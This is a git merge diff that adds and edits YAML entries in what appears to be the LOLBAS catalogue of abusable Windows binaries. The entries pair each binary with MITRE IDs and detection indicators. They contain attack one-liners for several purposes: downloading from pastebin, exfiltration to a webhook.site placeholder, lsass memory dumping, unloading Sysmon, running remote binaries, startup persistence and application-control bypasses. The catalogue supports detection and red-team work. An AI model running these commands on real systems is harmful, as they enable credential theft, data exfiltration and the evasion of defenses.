Merge branch 'master' into fixing-yaml-issues

2024-12-25 22:39:27 +01:00 · 2021-10-22 14:53:09 +02:00 · 2021-10-22 14:53:09 +02:00 · a55e2249c1
commit a55e2249c1
parent 2e08819eef 3b848e6121
26 changed files with 535 additions and 9 deletions
--- a/yml/LOLUtilz/OtherBinaries/Upload.yml
+++ b/yml/LOLUtilz/OtherBinaries/Upload.yml
@ -0,0 +1,18 @@
 ---
 Name: Update.exe
 Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation.
 Author: 'Jesus Galvez'
 Created: '2020-11-01'
  - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
    Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied.
    Usecase: Execute binary
    Category: Execute
    Privileges: User
    MitreID: T1218
    MitreLink: https://attack.mitre.org/techniques/T1218/
    OperatingSystem: Windows 7 and up with Whatsapp installed
 Full_Path:
  - Path: '%localappdata%\Whatsapp\Update.exe'
 Detection: 
  - IOC: "%localappdata%\Whatsapp\Update.exe" spawned an unknown process
 ---
--- a/yml/OSBinaries/AppInstaller.yml
+++ b/yml/OSBinaries/AppInstaller.yml
@ -0,0 +1,22 @@
 ---
 Name: AppInstaller.exe
 Description: Tool used for installation of AppX/MSIX applications on Windows 10
 Author: 'Wade Hickey'
 Created: '2020-12-02'
 Commands:
  - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
    Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY> 
    Usecase: Download file from Internet
    Category: Download
    Privileges: User
    MitreID: T1105
    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
    OperatingSystem: Windows 10
 Full_Path:
  - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
 Resources:
  - Link: https://twitter.com/notwhickey/status/1333900137232523264
 Acknowledgement:
  - Person: Wade Hickey
    Handle: '@notwhickey'
 ---
--- a/yml/OSBinaries/Aspnet_Compiler.yml
+++ b/yml/OSBinaries/Aspnet_Compiler.yml
@ -0,0 +1,28 @@
 ---
 Name: Aspnet_Compiler.exe
 Description: ASP.NET Compilation Tool 
 Author: Jimmy (@bohops)
 Created: 2021-09-26
 Commands:
  - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
    Description: Execute C# code with the Build Provider and proper folder structure in place.
    Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
    Category: AWL Bypass
    Privileges: User
    MitreID: T1218
    MitreLink: https://attack.mitre.org/techniques/T1218/
    OperatingSystem: Windows 10
 Full_Path:
  - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
  - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
 Code_Sample: 
  - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
 Detection: 
  - IOC: Sysmon Event ID 1 - Process Creation
 Resources:
  - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/
  - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8
 Acknowledgement:
  - Person: cpl
    Handle: '@cpl3h'
 ---
--- a/yml/OSBinaries/Certutil.yml
+++ b/yml/OSBinaries/Certutil.yml
@ -1,6 +1,6 @@
 ---
 Name: Certutil.exe
-Description: Windows binary used for handeling certificates
+Description: Windows binary used for handling certificates
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
--- a/yml/OSBinaries/Cmd.yml
+++ b/yml/OSBinaries/Cmd.yml
@ -4,7 +4,7 @@ Description: The command-line interpreter in Windows
 Author: 'Ye Yint Min Thu Htut'
 Created: 2019-06-26
 Commands:
-  - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
+  - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
    Description: Add content to an Alternate Data Stream (ADS).
    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
    Category: ADS
--- a/yml/OSBinaries/DataSvcUtil.yml
+++ b/yml/OSBinaries/DataSvcUtil.yml
@ -0,0 +1,30 @@
 ---
 Name: DataSvcUtil.exe
 Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.
 Author: 'Ialle Teixeira'
 Created: '01/12/2020'
 Commands:
  - Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile
    Description: Upload file, credentials or data exfiltration in general
    Usecase: Upload file
    Category: Upload
    Privileges: User
    MitreID: T1567
    MitreLink: https://attack.mitre.org/techniques/T1567/
    OperatingSystem: Windows 10
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe
 Code_Sample: 
  - Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6
 Detection: 
  - IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory.
  - IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS.
  - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.
 Resources:
  - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe
  - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services
  - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services
 Acknowledgement:
  - Person: Ialle Teixeira
    Handle: '@NtSetDefault'
 ---
--- a/yml/OSBinaries/Dllhost.yml
+++ b/yml/OSBinaries/Dllhost.yml
@ -0,0 +1,30 @@
 ---
 Name: Dllhost.exe
 Description: Used by Windows to DLL Surrogate COM Objects
 Author: 'Nasreddine Bencherchali'
 Created: '2020-11-07'
 Commands:
  - Command: dllhost.exe /Processid:{CLSID}
    Description: Use dllhost.exe to load a registered or hijacked COM Server payload.
    Usecase: Execute a DLL Surrogate COM Object.
    Category: Execute
    Privileges: User
    MitreID: T1546.015
    MitreLink: https://attack.mitre.org/techniques/T1546/015/
    OperatingSystem: Windows 10 (and likely previous versions)
 Full_Path:
  - Path: C:\Windows\System32\dllhost.exe
  - Path: C:\Windows\SysWOW64\dllhost.exe
 Code_Sample: 
 - Code:
 Detection:
 - IOC:
 Resources:
  - Link: https://twitter.com/CyberRaiju/status/1167415118847598594
  - Link: https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08
 Acknowledgement:
  - Person: Jai Minton
    Handle: '@CyberRaiju'
  - Person: Nasreddine Bencherchali
    Handle: '@nas_bench'
 ---
--- a/yml/OSBinaries/Findstr.yml
+++ b/yml/OSBinaries/Findstr.yml
@ -42,7 +42,7 @@ Full_Path:
 Code_Sample:
 - Code:
 Detection:
- - IOC: finstr.exe should normally not be invoked on a client system
+ - IOC: findstr.exe should normally not be invoked on a client system
 Resources:
  - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
--- a/yml/OSBinaries/IMEWDBLD.yml
+++ b/yml/OSBinaries/IMEWDBLD.yml
@ -0,0 +1,22 @@
 ---
 Name: IMEWDBLD.exe
 Description: Microsoft IME Open Extended Dictionary Module
 Author: 'Wade Hickey'
 Created: '2020-03-05'
 Commands:
  - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
    Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> 
    Usecase: Download file from Internet
    Category: Download
    Privileges: User
    MitreID: T1105
    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
    OperatingSystem: Windows 10
 Full_Path:
  - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
 Resources:
  - Link: https://twitter.com/notwhickey/status/1367493406835040265
 Acknowledgement:
  - Person: Wade Hickey
    Handle: '@notwhickey'
 ---
--- a/yml/OSBinaries/Msbuild.yml
+++ b/yml/OSBinaries/Msbuild.yml
@ -20,6 +20,14 @@ Commands:
    MitreID: T1127
    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: msbuild.exe project.proj
    Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
    Usecase: Execute project file that contains XslTransformation tag parameters
    Category: Execute
    Privileges: User
    MitreID: T1127
    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10    
 Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
@ -27,8 +35,9 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
  - Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
 Code_Sample: 
- Code:
+  - Code:
 Detection:
 - IOC: Msbuild.exe should not normally be executed on workstations
 Resources:
@ -36,9 +45,12 @@ Resources:
  - Link: https://github.com/Cn33liz/MSBuildShell
  - Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
  - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
  - Link: https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
  - Person: Cn33liz
    Handle: '@Cneelis'
  - Person: Jimmy
    Handle: '@bohops'
 ---
--- a/yml/OSBinaries/Pnputil.yml
+++ b/yml/OSBinaries/Pnputil.yml
@ -0,0 +1,23 @@
 ---
 Name: Pnputil.exe
 Description: used for Install drivers.
 Author: Hai vaknin (lux)
 Created: 25/12/2020
 Commands:
  - Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf
    Description: used for Install drivers
    Usecase: add malicious driver.
    Category: Execute
    Privileges: Administrator
    MitreID: T1215
    MitreLink: https://attack.mitre.org/techniques/T1215
    OperatingSystem: Windows 10,7 
 Full_Path:
  - Path: C:\Windows\system32\pnputil.exe
 Code_Sample: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf
 Acknowledgement:
  - Person: Hai Vaknin(Lux) 
    Handle: 'LuxNoBulIshit'
  - Person: Avihay eldad
    Handle: 'aloneliassaf'
 ---
--- a/yml/OSBinaries/Syncappvpublishingserver.yml
+++ b/yml/OSBinaries/Syncappvpublishingserver.yml
@ -11,7 +11,7 @@ Commands:
    Privileges: User
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+    OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
 Full_Path:
  - Path: C:\Windows\System32\SyncAppvPublishingServer.exe
  - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
--- a/yml/OSBinaries/Wsreset.yml
+++ b/yml/OSBinaries/Wsreset.yml
@ -19,6 +19,7 @@ Code_Sample:
 Detection:
 - IOC: wsreset.exe launching child process other than mmc.exe
 - IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command
 - IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen
 Resources:
  - Link: https://www.activecyber.us/activelabs/windows-uac-bypass
  - Link: https://twitter.com/ihack4falafel/status/1106644790114947073
--- a/yml/OSBinaries/fltMC.yml
+++ b/yml/OSBinaries/fltMC.yml
@ -0,0 +1,26 @@
 ---
 Name: fltMC.exe
 Description: Filter Manager Control Program used by Windows
 Author: 'John Lambert'
 Created: '2021-09-18'
 Commands:
  - Command: fltMC.exe unload SysmonDrv
    Description: Unloads a driver used by security agents
    Usecase: Defense evasion
    Category: ADS 
    Privileges: Admin
    MitreID: T1562
    MitreLink: https://attack.mitre.org/techniques/T1562/002/
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
  - Path: C:\Windows\System32\fltMC.exe
 Code_Sample: 
 - Code:
 Detection:
 - IOC: 4688 events with fltMC.exe
 Resources:
  - Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon
 Acknowledgement:
  - Person: Carlos Perez
    Handle: '@Carlos_Perez'
 ---
--- a/yml/OSScripts/CL_LoadAssembly.yml
+++ b/yml/OSScripts/CL_LoadAssembly.yml
@ -0,0 +1,26 @@
 ---
 Name: CL_LoadAssembly.ps1
 Description: PowerShell Diagnostic Script
 Author: Jimmy (@bohops)
 Created: 2021-09-26
 Commands:
  - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()'
    Description: Proxy execute Managed DLL with PowerShell
    Usecase: Execute proxied payload with Microsoft signed binary
    Category: Execute
    Privileges: User
    MitreID: T1059.001
    MitreLink: https://attack.mitre.org/techniques/T1059/001/
    OperatingSystem: Windows 10 21H1 (likely other versions as well)
 Full_Path:
  - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
 Code_Sample: 
  - Code:
 Detection: 
  - IOC:
 Resources:
  - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
 Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'
 ---
--- a/yml/OSScripts/UtilityFunctions.yml
+++ b/yml/OSScripts/UtilityFunctions.yml
@ -0,0 +1,26 @@
 ---
 Name: UtilityFunctions.ps1
 Description: PowerShell Diagnostic Script
 Author: Jimmy (@bohops)
 Created: 2021-09-26
 Commands:
  - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”'
    Description: Proxy execute Managed DLL with PowerShell
    Usecase: Execute proxied payload with Microsoft signed binary
    Category: Execute
    Privileges: User
    MitreID: T1059.001
    MitreLink: https://attack.mitre.org/techniques/T1059/001/
    OperatingSystem: Windows 10 21H1 (likely other versions as well)
 Full_Path:
  - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
 Code_Sample: 
  - Code:
 Detection: 
  - IOC:
 Resources:
  - Link: https://twitter.com/nickvangilder/status/1441003666274668546
 Acknowledgement:
  - Person: Nick VanGilder
    Handle: '@nickvangilder'
 ---
--- a/yml/OtherMSBinaries/Adplus.yml
+++ b/yml/OtherMSBinaries/Adplus.yml
@ -0,0 +1,27 @@
 ---
 Name: adplus.exe
 Description: Debugging tool included with Windows Debugging Tools
 Author: mr.d0x
 Created: 1/9/2021
 Commands:
  - Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet
    Description: Creates a memory dump of the lsass process
    Usecase: Create memory dump and parse it offline
    Category: Dump
    Privileges: SYSTEM
    MitreID: T1003
    MitreLink: https://attack.mitre.org/techniques/T1003/
    OperatingSystem: All Windows
 Full_Path:
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
 Code_Sample: 
  - Code: 
 Detection: 
  - IOC: 
 Resources:
  - Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/
 Acknowledgement:
  - Person: mr.d0x
    Handle: '@mrd0x'
 ---
--- a/yml/OtherMSBinaries/Cdb.yml
+++ b/yml/OtherMSBinaries/Cdb.yml
@ -12,6 +12,16 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows
  - Command: |
     cdb.exe -pd -pn <process_name>
     .shell <cmd>
    Description: Attaching to any process and executing shell commands
    Usecase: Run a shell command under a trusted Microsoft signed binary
    Category: Execute
    Privileges: User
    MitreID: 
    MitreLink:
    OperatingSystem: Windows
 Full_Path:
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
@ -23,7 +33,12 @@ Resources:
  - Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
  - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
  - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
-Acknowledgement:
+  - Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/
 Acknoledgement:
  - Person: Matt Graeber
    Handle: '@mattifestation'
  - Person: mr.d0x
    Handle: '@mrd0x'
  - Person: Spooky Sec
    Handle: '@sec_spooky'
 ---
--- a/yml/OtherMSBinaries/Fsi.yml
+++ b/yml/OtherMSBinaries/Fsi.yml
@ -0,0 +1,38 @@
 ---
 Name: Fsi.exe
 Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.
 Author: Jimmy (@bohops)
 Created: 2021-09-26
 Commands:
  - Command: fsi.exe c:\path\to\test.fsscript
    Description: Execute F# code via script file
    Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
    Category: AWL Bypass
    Privileges: User
    MitreID: T1059
    MitreLink: https://attack.mitre.org/techniques/T1059/
    OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
  - Command: fsi.exe
    Description: Execute F# code via interactive command line 
    Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
    Category: AWL Bypass
    Privileges: User
    MitreID: T1059
    MitreLink: https://attack.mitre.org/techniques/T1059/
    OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
 Full_Path:
  - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe
  - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
 Code_Sample: 
  - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
 Detection: 
  - IOC: Sysmon Event ID 1 - Process Creation
 Resources:
  - Link: https://twitter.com/NickTyrer/status/904273264385589248
  - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
 Acknowledgement:
  - Person: Nick Tyrer 
    Handle: '@NickTyrer'
  - Person: Jimmy
    Handle: '@bohops'
 ---
--- a/yml/OtherMSBinaries/FsiAnyCpu.yml
+++ b/yml/OtherMSBinaries/FsiAnyCpu.yml
@ -0,0 +1,36 @@
 ---
 Name: FsiAnyCpu.exe
 Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio.
 Author: Jimmy (@bohops)
 Created: 2021-09-26
 Commands:
  - Command: fsianycpu.exe c:\path\to\test.fsscript
    Description: Execute F# code via script file
    Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
    Category: AWL Bypass
    Privileges: User
    MitreID: T1059
    MitreLink: https://attack.mitre.org/techniques/T1059/
    OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
  - Command: fsianycpu.exe
    Description: Execute F# code via interactive command line 
    Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
    Category: AWL Bypass
    Privileges: User
    MitreID: T1059
    MitreLink: https://attack.mitre.org/techniques/T1059/
    OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
 Full_Path:
  - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
 Code_Sample: 
  - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
 Detection: 
  - IOC: Sysmon Event ID 1 - Process Creation
 Resources:
  - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
 Acknowledgement:
  - Person: Nick Tyrer 
    Handle: '@NickTyrer'
  - Person: Jimmy
    Handle: '@bohops'
 ---
--- a/yml/OtherMSBinaries/Remote.yml
+++ b/yml/OtherMSBinaries/Remote.yml
@ -0,0 +1,43 @@
 ---
 Name: Remote.exe
 Description: Debugging tool included with Windows Debugging Tools
 Author: mr.d0x
 Created: 1/6/2021
 Commands:
  - Command: Remote.exe /s "powershell.exe" anythinghere
    Description: Spawns powershell as a child process of remote.exe
    Usecase: Executes a process under a trusted Microsoft signed binary 
    Category: AWL Bypass
    Privileges: User
    MitreID:
    MitreLink: 
    OperatingSystem:
  - Command: Remote.exe /s "powershell.exe" anythinghere
    Description: Spawns powershell as a child process of remote.exe
    Usecase: Executes a process under a trusted Microsoft signed binary
    Category: Execute
    Privileges: User
    MitreID:
    MitreLink: 
    OperatingSystem:
  - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
    Description: Run a remote file
    Usecase: Executing a remote binary without saving file to disk
    Category: Execute
    Privileges: User
    MitreID: 
    MitreLink: 
    OperatingSystem:
 Full_Path:
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
 Code_Sample: 
  - Code: 
 Detection: 
  - IOC: remote.exe spawned
 Resources:
  - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/
 Acknowledgement:
  - Person: mr.d0x
    Handle: '@mrd0x'
 ---
--- a/yml/OtherMSBinaries/Update.yml
+++ b/yml/OtherMSBinaries/Update.yml
@ -92,6 +92,22 @@ Commands:
    MitreID: T1218
    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows 7 and up with Microsoft Teams installed
  - Command: Update.exe --createShortcut=payload.exe -l=Startup
    Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
    Usecase: Execute binary
    Category: Execute
    Privileges: User
    MitreID: T1547
    MitreLink: https://attack.mitre.org/techniques/T1547/001/
    OperatingSystem: Windows 7 and up with Microsoft Teams installed
  - Command: Update.exe --removeShortcut=payload.exe -l=Startup
    Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page.
    Usecase: Execute binary
    Category: Execute
    Privileges: User
    MitreID: T1070
    MitreLink: https://attack.mitre.org/techniques/T1070/
    OperatingSystem: Windows 7 and up with Microsoft Teams installed
 Full_Path:
  - Path: '%localappdata%\Microsoft\Teams\update.exe'
 Code_Sample:
@ -114,4 +130,5 @@ Acknowledgement:
    Handle: '@MrUn1k0d3r'
  - Person: Adam
    Handle: '@Hexacorn'
  - Person: Jesus Galvez
 ---
--- a/yml/OtherMSBinaries/VSIISExeLauncher.yml
+++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml
@ -0,0 +1,26 @@
 ---
 Name: VSIISExeLauncher.exe
 Description: Binary will execute specified binary. Part of VS/VScode installation.
 Author: 'timwhite'
 Created: '2021-09-24'
 Commands:
  - Command: VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here"
    Description: The above binary will execute other binary.
    Usecase: Execute any binary with given arguments.
    Category: Execute
    Privileges: User
    MitreID: T1218
    MitreLink: https://attack.mitre.org/techniques/T1218/
    OperatingSystem: Windows 10 and up with VS/VScode installed
 Full_Path:
  - Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe'
 Code_Sample:
  - Code:
 Detection: 
  - IOC: VSIISExeLauncher.exe spawned an unknown process
 Resources:
  - Link: https://github.com/timwhitez
 Acknowledgement:
  - Person: timwhite
    Handle: 
 ---
--- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml
+++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml
@ -0,0 +1,31 @@
 ---
 Name: VisualUiaVerifyNative.exe
 Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.
 Author: Jimmy (@bohops)
 Created: 2021-09-26
 Commands:
  - Command: VisualUiaVerifyNative.exe
    Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing.
    Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
    Category: AWL Bypass
    Privileges: User
    MitreID: T1218
    MitreLink: https://attack.mitre.org/techniques/T1218/
    OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
 Full_Path:
  - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe
  - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe
  - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe
 Code_Sample: 
  - Code: 
 Detection: 
  - IOC: Sysmon Event ID 1 - Process Creation
 Resources:
  - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/
  - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad
 Acknowledgement:
  - Person: Lee Christensen
    Handle: '@tifkin'
  - Person: Jimmy
    Handle: '@bohops'
 ---
--- a/yml/OtherMSBinaries/Wfc.yml
+++ b/yml/OtherMSBinaries/Wfc.yml
@ -0,0 +1,28 @@
 ---
 Name: Wfc.exe
 Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).
 Author: Jimmy (@bohops)
 Created: 2021-09-26
 Commands:
  - Command: wfc.exe c:\path\to\test.xoml
    Description: Execute arbitrary C# code embedded in a XOML file.
    Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
    Category: AWL Bypass
    Privileges: User
    MitreID: T1218
    MitreLink: https://attack.mitre.org/techniques/T1218/
    OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
 Full_Path:
  - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
 Code_Sample: 
  - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
 Detection: 
  - IOC: Sysmon Event ID 1 - Process Creation
 Resources:
  - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
 Acknowledgement:
  - Person: Matt Graeber
    Handle: '@mattifestation'
  - Person: Jimmy
    Handle: '@bohops'
 ---
--- a/yml/OtherMSBinaries/Winword.yml
+++ b/yml/OtherMSBinaries/Winword.yml
@ -13,6 +13,7 @@ Commands:
    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
    OperatingSystem: Windows
 Full_Path:
  - Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe
  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe
  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe